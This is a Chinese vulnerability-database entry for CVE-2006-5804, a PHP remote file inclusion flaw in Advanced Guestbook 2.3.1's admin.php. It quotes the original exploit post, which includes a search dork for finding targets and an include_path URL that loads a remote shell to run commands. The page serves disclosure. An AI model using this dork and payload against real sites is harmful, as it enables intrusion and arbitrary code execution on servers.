Advanced Guestbook admin.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192929 漏洞类型 输入验证
发布时间 2006-11-08 更新时间 2006-11-14
CVE编号 CVE-2006-5804 CNNVD-ID CNNVD-200611-141
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-141
|漏洞详情
AdvancedGuestbook的admin.php存在PHP远程文件包含漏洞,远程攻击者可以通过include_path参数中的URL执行任意PHP代码。
|漏洞EXP
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Author: BrokeN-ProXy
Script  : admin.php
Found : www.hotscripts.com
Risk    : Dangerous
Dork   : "powered by: Advanced Guestbook 2.3.1"

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Exploit:

www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd

Notice:

[AGuest Path] may be more than One, You are adviced to use the direct result os search.

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

GreestZ: 
nEt^DeViL[ My Best friend ] .:.  RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:.  Red Devils Crew[ |Màstr ]  .:. PROHacker  .:. Devil-00 .:. Red_Casper  .:.  ReMoTeR  .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh  .:. Team-Evil [ X-BLooD-X ]  .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in:
www.3asfh.net/vb/
www.lezr.com/vb/

broken-proxy[at]Linuxmail[dot]org
|参考资料

来源:BID
名称:20902
链接:http://www.securityfocus.com/bid/20902
来源:BUGTRAQ
名称:20061103AdvancedGuestbook2.3.1(Admin.php)RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/450729/100/0/threaded
来源:SECUNIA
名称:22756
链接:http://secunia.com/advisories/22756
来源:OSVDB
名称:30230
链接:http://www.osvdb.org/30230
来源:VUPEN
名称:ADV-2006-4385
链接:http://www.frsirt.com/english/advisories/2006/4385
来源:SREASON
名称:1833
链接:http://securityreason.com/securityalert/1833